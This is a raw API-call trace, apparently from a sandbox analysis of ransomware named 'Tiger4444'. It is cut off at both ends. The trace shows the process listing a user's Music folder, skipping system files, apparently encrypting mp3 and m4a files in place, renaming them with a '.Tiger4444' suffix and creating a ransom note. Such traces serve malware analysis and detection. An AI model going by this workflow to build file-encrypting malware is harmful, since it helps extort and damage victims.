lpString2="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\JvO3tXgHMCsM-" | out: lpString1="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\JvO3tXgHMCsM-") returned="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\JvO3tXgHMCsM-" [0046.149] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\JvO3tXgHMCsM-", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\JvO3tXgHMCsM-\\") returned="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\JvO3tXgHMCsM-\\" [0046.149] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\JvO3tXgHMCsM-\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\JvO3tXgHMCsM-\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\JvO3tXgHMCsM-\\.BFC0E91B00AE8A0620D3" [0046.149] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\JvO3tXgHMCsM-\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\music\\huzlktkchcijs8zqd\\jvo3txghmcsm-\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2ac [0046.151] WriteFile (in: hFile=0x2ac, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0046.156] FlushFileBuffers (hFile=0x2ac) returned 1 [0046.157] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\JvO3tXgHMCsM-\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0046.157] CloseHandle (hObject=0x2ac) returned 1 [0046.158] lstrlenW (lpString="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\JvO3tXgHMCsM-") returned 53 [0046.158] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0046.158] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\JvO3tXgHMCsM-\\*", lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5f84b0e0, ftCreationTime.dwHighDateTime=0x1d4cb2f, ftLastAccessTime.dwLowDateTime=0x80c6c470, ftLastAccessTime.dwHighDateTime=0x1d4ce07, ftLastWriteTime.dwLowDateTime=0x8085c953, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc73208 [0046.158] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0046.158] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0046.158] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0046.158] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0046.158] FindNextFileW (in: hFindFile=0xc73208, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5f84b0e0, ftCreationTime.dwHighDateTime=0x1d4cb2f, ftLastAccessTime.dwLowDateTime=0x80c6c470, ftLastAccessTime.dwHighDateTime=0x1d4ce07, ftLastWriteTime.dwLowDateTime=0x8085c953, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0046.158] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0046.158] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0046.158] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0046.158] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0046.158] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0046.158] FindNextFileW (in: hFindFile=0xc73208, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x8085c953, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x8085c953, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x80887370, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0046.158] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0046.159] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0046.159] FindNextFileW (in: hFindFile=0xc73208, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xffbce520, ftCreationTime.dwHighDateTime=0x1d4cdf8, ftLastAccessTime.dwLowDateTime=0x25d46750, ftLastAccessTime.dwHighDateTime=0x1d4cf99, ftLastWriteTime.dwLowDateTime=0x25d46750, ftLastWriteTime.dwHighDateTime=0x1d4cf99, nFileSizeHigh=0x0, nFileSizeLow=0x1a5c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="D1biJ0M12k7D5tV.mp3", cAlternateFileName="D1BIJ0~1.MP3")) returned 1 [0046.159] lstrcmpiW (lpString1="D1biJ0M12k7D5tV.mp3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0046.159] lstrcmpiW (lpString1="D1biJ0M12k7D5tV.mp3", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0046.159] lstrcmpiW (lpString1="D1biJ0M12k7D5tV.mp3", lpString2="Tiger4444.exe") returned -1 [0046.159] lstrcmpiW (lpString1="D1biJ0M12k7D5tV.mp3", lpString2=".") returned 1 [0046.159] lstrcmpiW (lpString1="D1biJ0M12k7D5tV.mp3", lpString2="..") returned 1 [0046.159] lstrcmpiW (lpString1="D1biJ0M12k7D5tV.mp3", lpString2="windows") returned -1 [0046.159] lstrcmpiW (lpString1="D1biJ0M12k7D5tV.mp3", lpString2="bootmgr") returned 1 [0046.159] lstrcmpiW (lpString1="D1biJ0M12k7D5tV.mp3", lpString2="pagefile.sys") returned -1 [0046.159] lstrcmpiW (lpString1="D1biJ0M12k7D5tV.mp3", lpString2="boot") returned 1 [0046.159] lstrcmpiW (lpString1="D1biJ0M12k7D5tV.mp3", lpString2="ids.txt") returned -1 [0046.159] lstrcmpiW (lpString1="D1biJ0M12k7D5tV.mp3", lpString2="NTUSER.DAT") returned -1 [0046.159] lstrcpyW (in: lpString1=0x30aeb14, lpString2="D1biJ0M12k7D5tV.mp3" | out: lpString1="D1biJ0M12k7D5tV.mp3") returned="D1biJ0M12k7D5tV.mp3" [0046.159] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\JvO3tXgHMCsM-\\D1biJ0M12k7D5tV.mp3", dwFileAttributes=0x0) returned 1 [0046.159] lstrlenW (lpString="D1biJ0M12k7D5tV.mp3") returned 19 [0046.159] lstrlenW (lpString="Tiger4444") returned 9 [0046.159] lstrcmpiW (lpString1="7D5tV.mp3", lpString2="Tiger4444") returned -1 [0046.159] lstrlenW (lpString=".dll") returned 4 [0046.160] lstrcmpiW (lpString1=".mp3", lpString2=".dll") returned 1 [0046.160] lstrlenW (lpString=".lnk") returned 4 [0046.160] lstrcmpiW (lpString1=".mp3", lpString2=".lnk") returned 1 [0046.160] lstrlenW (lpString=".ini") returned 4 [0046.160] lstrcmpiW (lpString1=".mp3", lpString2=".ini") returned 1 [0046.160] lstrlenW (lpString=".sys") returned 4 [0046.160] lstrcmpiW (lpString1=".mp3", lpString2=".sys") returned -1 [0046.160] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\JvO3tXgHMCsM-\\D1biJ0M12k7D5tV.mp3" (normalized: "c:\\users\\fd1hvy\\music\\huzlktkchcijs8zqd\\jvo3txghmcsm-\\d1bij0m12k7d5tv.mp3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0046.160] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0046.160] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13761310612) returned 1 [0046.160] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=6748) returned 1 [0046.160] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89680 [0046.160] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc717b8 [0046.160] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1d60, lpName=0x0) returned 0x2c8 [0046.160] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1d60) returned 0xbe0000 [0046.161] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0046.161] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75db0 [0046.161] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0046.161] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75950 [0046.161] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0046.161] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75950 | out: hHeap=0xc50000) returned 1 [0046.161] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0046.161] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75db0 | out: hHeap=0xc50000) returned 1 [0046.161] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13761424081) returned 1 [0046.161] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89680 | out: hHeap=0xc50000) returned 1 [0046.161] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc717b8 | out: hHeap=0xc50000) returned 1 [0046.161] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0046.161] CloseHandle (hObject=0x2c8) returned 1 [0046.161] CloseHandle (hObject=0x260) returned 1 [0046.163] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\JvO3tXgHMCsM-\\D1biJ0M12k7D5tV.mp3.Tiger4444") returned 83 [0046.163] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\JvO3tXgHMCsM-\\D1biJ0M12k7D5tV.mp3" (normalized: "c:\\users\\fd1hvy\\music\\huzlktkchcijs8zqd\\jvo3txghmcsm-\\d1bij0m12k7d5tv.mp3"), lpNewFileName="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\JvO3tXgHMCsM-\\D1biJ0M12k7D5tV.mp3.Tiger4444" (normalized: "c:\\users\\fd1hvy\\music\\huzlktkchcijs8zqd\\jvo3txghmcsm-\\d1bij0m12k7d5tv.mp3.tiger4444"), dwFlags=0x1) returned 1 [0046.163] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=6752 | out: Addend=0xc6f980) returned 20437456 [0046.163] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=1 | out: Addend=0xc6f98c) returned 4604 [0046.163] FindNextFileW (in: hFindFile=0xc73208, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4a0f6360, ftCreationTime.dwHighDateTime=0x1d4c90c, ftLastAccessTime.dwLowDateTime=0x9889efa0, ftLastAccessTime.dwHighDateTime=0x1d4c881, ftLastWriteTime.dwLowDateTime=0x9889efa0, ftLastWriteTime.dwHighDateTime=0x1d4c881, nFileSizeHigh=0x0, nFileSizeLow=0x14095, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="FGCqab 6Q9IrvSbP.mp3", cAlternateFileName="FGCQAB~1.MP3")) returned 1 [0046.163] lstrcmpiW (lpString1="FGCqab 6Q9IrvSbP.mp3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0046.163] lstrcmpiW (lpString1="FGCqab 6Q9IrvSbP.mp3", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0046.163] lstrcmpiW (lpString1="FGCqab 6Q9IrvSbP.mp3", lpString2="Tiger4444.exe") returned -1 [0046.163] lstrcmpiW (lpString1="FGCqab 6Q9IrvSbP.mp3", lpString2=".") returned 1 [0046.163] lstrcmpiW (lpString1="FGCqab 6Q9IrvSbP.mp3", lpString2="..") returned 1 [0046.163] lstrcmpiW (lpString1="FGCqab 6Q9IrvSbP.mp3", lpString2="windows") returned -1 [0046.163] lstrcmpiW (lpString1="FGCqab 6Q9IrvSbP.mp3", lpString2="bootmgr") returned 1 [0046.164] lstrcmpiW (lpString1="FGCqab 6Q9IrvSbP.mp3", lpString2="pagefile.sys") returned -1 [0046.164] lstrcmpiW (lpString1="FGCqab 6Q9IrvSbP.mp3", lpString2="boot") returned 1 [0046.164] lstrcmpiW (lpString1="FGCqab 6Q9IrvSbP.mp3", lpString2="ids.txt") returned -1 [0046.164] lstrcmpiW (lpString1="FGCqab 6Q9IrvSbP.mp3", lpString2="NTUSER.DAT") returned -1 [0046.164] lstrcpyW (in: lpString1=0x30aeb14, lpString2="FGCqab 6Q9IrvSbP.mp3" | out: lpString1="FGCqab 6Q9IrvSbP.mp3") returned="FGCqab 6Q9IrvSbP.mp3" [0046.164] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\JvO3tXgHMCsM-\\FGCqab 6Q9IrvSbP.mp3", dwFileAttributes=0x0) returned 1 [0046.164] lstrlenW (lpString="FGCqab 6Q9IrvSbP.mp3") returned 20 [0046.164] lstrlenW (lpString="Tiger4444") returned 9 [0046.164] lstrcmpiW (lpString1="rvSbP.mp3", lpString2="Tiger4444") returned -1 [0046.164] lstrlenW (lpString=".dll") returned 4 [0046.164] lstrcmpiW (lpString1=".mp3", lpString2=".dll") returned 1 [0046.164] lstrlenW (lpString=".lnk") returned 4 [0046.164] lstrcmpiW (lpString1=".mp3", lpString2=".lnk") returned 1 [0046.164] lstrlenW (lpString=".ini") returned 4 [0046.164] lstrcmpiW (lpString1=".mp3", lpString2=".ini") returned 1 [0046.164] lstrlenW (lpString=".sys") returned 4 [0046.164] lstrcmpiW (lpString1=".mp3", lpString2=".sys") returned -1 [0046.164] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\JvO3tXgHMCsM-\\FGCqab 6Q9IrvSbP.mp3" (normalized: "c:\\users\\fd1hvy\\music\\huzlktkchcijs8zqd\\jvo3txghmcsm-\\fgcqab 6q9irvsbp.mp3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0046.164] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0046.164] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13761737820) returned 1 [0046.164] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=82069) returned 1 [0046.164] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89d10 [0046.164] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71ea0 [0046.164] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x143a0, lpName=0x0) returned 0x2c8 [0046.165] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x143a0) returned 0xbe0000 [0046.166] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0046.166] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75720 [0046.166] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0046.166] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75c98 [0046.166] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0046.166] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75c98 | out: hHeap=0xc50000) returned 1 [0046.166] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0046.167] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75720 | out: hHeap=0xc50000) returned 1 [0046.167] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13761967167) returned 1 [0046.167] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89d10 | out: hHeap=0xc50000) returned 1 [0046.167] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71ea0 | out: hHeap=0xc50000) returned 1 [0046.167] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0046.168] CloseHandle (hObject=0x2c8) returned 1 [0046.168] CloseHandle (hObject=0x260) returned 1 [0046.171] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\JvO3tXgHMCsM-\\FGCqab 6Q9IrvSbP.mp3.Tiger4444") returned 84 [0046.171] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\JvO3tXgHMCsM-\\FGCqab 6Q9IrvSbP.mp3" (normalized: "c:\\users\\fd1hvy\\music\\huzlktkchcijs8zqd\\jvo3txghmcsm-\\fgcqab 6q9irvsbp.mp3"), lpNewFileName="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\JvO3tXgHMCsM-\\FGCqab 6Q9IrvSbP.mp3.Tiger4444" (normalized: "c:\\users\\fd1hvy\\music\\huzlktkchcijs8zqd\\jvo3txghmcsm-\\fgcqab 6q9irvsbp.mp3.tiger4444"), dwFlags=0x1) returned 1 [0046.171] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=82080 | out: Addend=0xc6f980) returned 20444208 [0046.171] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=2 | out: Addend=0xc6f98c) returned 4605 [0046.171] FindNextFileW (in: hFindFile=0xc73208, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfa3618d0, ftCreationTime.dwHighDateTime=0x1d4d57b, ftLastAccessTime.dwLowDateTime=0xf592b6e0, ftLastAccessTime.dwHighDateTime=0x1d4cf85, ftLastWriteTime.dwLowDateTime=0xf592b6e0, ftLastWriteTime.dwHighDateTime=0x1d4cf85, nFileSizeHigh=0x0, nFileSizeLow=0x12a02, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Oddm UVF74ixYdV9S.m4a", cAlternateFileName="ODDMUV~1.M4A")) returned 1 [0046.171] lstrcmpiW (lpString1="Oddm UVF74ixYdV9S.m4a", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0046.172] lstrcmpiW (lpString1="Oddm UVF74ixYdV9S.m4a", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0046.172] lstrcmpiW (lpString1="Oddm UVF74ixYdV9S.m4a", lpString2="Tiger4444.exe") returned -1 [0046.172] lstrcmpiW (lpString1="Oddm UVF74ixYdV9S.m4a", lpString2=".") returned 1 [0046.172] lstrcmpiW (lpString1="Oddm UVF74ixYdV9S.m4a", lpString2="..") returned 1 [0046.172] lstrcmpiW (lpString1="Oddm UVF74ixYdV9S.m4a", lpString2="windows") returned -1 [0046.172] lstrcmpiW (lpString1="Oddm UVF74ixYdV9S.m4a", lpString2="bootmgr") returned 1 [0046.172] lstrcmpiW (lpString1="Oddm UVF74ixYdV9S.m4a", lpString2="pagefile.sys") returned -1 [0046.172] lstrcmpiW (lpString1="Oddm UVF74ixYdV9S.m4a", lpString2="boot") returned 1 [0046.172] lstrcmpiW (lpString1="Oddm UVF74ixYdV9S.m4a", lpString2="ids.txt") returned 1 [0046.172] lstrcmpiW (lpString1="Oddm UVF74ixYdV9S.m4a", lpString2="NTUSER.DAT") returned 1 [0046.172] lstrcpyW (in: lpString1=0x30aeb14, lpString2="Oddm UVF74ixYdV9S.m4a" | out: lpString1="Oddm UVF74ixYdV9S.m4a") returned="Oddm UVF74ixYdV9S.m4a" [0046.172] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\JvO3tXgHMCsM-\\Oddm UVF74ixYdV9S.m4a", dwFileAttributes=0x0) returned 1 [0046.172] lstrlenW (lpString="Oddm UVF74ixYdV9S.m4a") returned 21 [0046.172] lstrlenW (lpString="Tiger4444") returned 9 [0046.172] lstrcmpiW (lpString1="YdV9S.m4a", lpString2="Tiger4444") returned 1 [0046.172] lstrlenW (lpString=".dll") returned 4 [0046.172] lstrcmpiW (lpString1=".m4a", lpString2=".dll") returned 1 [0046.172] lstrlenW (lpString=".lnk") returned 4 [0046.172] lstrcmpiW (lpString1=".m4a", lpString2=".lnk") returned 1 [0046.172] lstrlenW (lpString=".ini") returned 4 [0046.172] lstrcmpiW (lpString1=".m4a", lpString2=".ini") returned 1 [0046.172] lstrlenW (lpString=".sys") returned 4 [0046.172] lstrcmpiW (lpString1=".m4a", lpString2=".sys") returned -1 [0046.172] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\JvO3tXgHMCsM-\\Oddm UVF74ixYdV9S.m4a" (normalized: "c:\\users\\fd1hvy\\music\\huzlktkchcijs8zqd\\jvo3txghmcsm-\\oddm uvf74ixydv9s.m4a"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0046.172] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0046.172] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13762551236) returned 1 [0046.172] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=76290) returned 1 [0046.173] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89c98 [0046.173] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71620 [0046.173] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x12d10, lpName=0x0) returned 0x2c8 [0046.173] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x12d10) returned 0xbe0000 [0046.174] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0046.174] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76440 [0046.174] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0046.174] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75608 [0046.174] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0046.174] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75608 | out: hHeap=0xc50000) returned 1 [0046.175] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0046.175] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76440 | out: hHeap=0xc50000) returned 1 [0046.175] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13762768616) returned 1 [0046.175] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89c98 | out: hHeap=0xc50000) returned 1 [0046.175] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71620 | out: hHeap=0xc50000) returned 1 [0046.175] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0046.175] CloseHandle (hObject=0x2c8) returned 1 [0046.175] CloseHandle (hObject=0x260) returned 1 [0046.178] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\JvO3tXgHMCsM-\\Oddm UVF74ixYdV9S.m4a.Tiger4444") returned 85 [0046.178] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\JvO3tXgHMCsM-\\Oddm UVF74ixYdV9S.m4a" (normalized: "c:\\users\\fd1hvy\\music\\huzlktkchcijs8zqd\\jvo3txghmcsm-\\oddm uvf74ixydv9s.m4a"), lpNewFileName="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\JvO3tXgHMCsM-\\Oddm UVF74ixYdV9S.m4a.Tiger4444" (normalized: "c:\\users\\fd1hvy\\music\\huzlktkchcijs8zqd\\jvo3txghmcsm-\\oddm uvf74ixydv9s.m4a.tiger4444"), dwFlags=0x1) returned 1 [0046.178] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=76304 | out: Addend=0xc6f980) returned 20526288 [0046.178] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=2 | out: Addend=0xc6f98c) returned 4607 [0046.178] FindNextFileW (in: hFindFile=0xc73208, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfa3618d0, ftCreationTime.dwHighDateTime=0x1d4d57b, ftLastAccessTime.dwLowDateTime=0xf592b6e0, ftLastAccessTime.dwHighDateTime=0x1d4cf85, ftLastWriteTime.dwLowDateTime=0xf592b6e0, ftLastWriteTime.dwHighDateTime=0x1d4cf85, nFileSizeHigh=0x0, nFileSizeLow=0x12a02, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Oddm UVF74ixYdV9S.m4a", cAlternateFileName="ODDMUV~1.M4A")) returned 0 [0046.178] FindClose (in: hFindFile=0xc73208 | out: hFindFile=0xc73208) returned 1 [0046.178] lstrcpyW (in: lpString1=0x30aeb14, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0046.178] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\JvO3tXgHMCsM-\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\music\\huzlktkchcijs8zqd\\jvo3txghmcsm-\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ac [0046.179] CreateFileMappingW (hFile=0x2ac, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x260 [0046.179] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 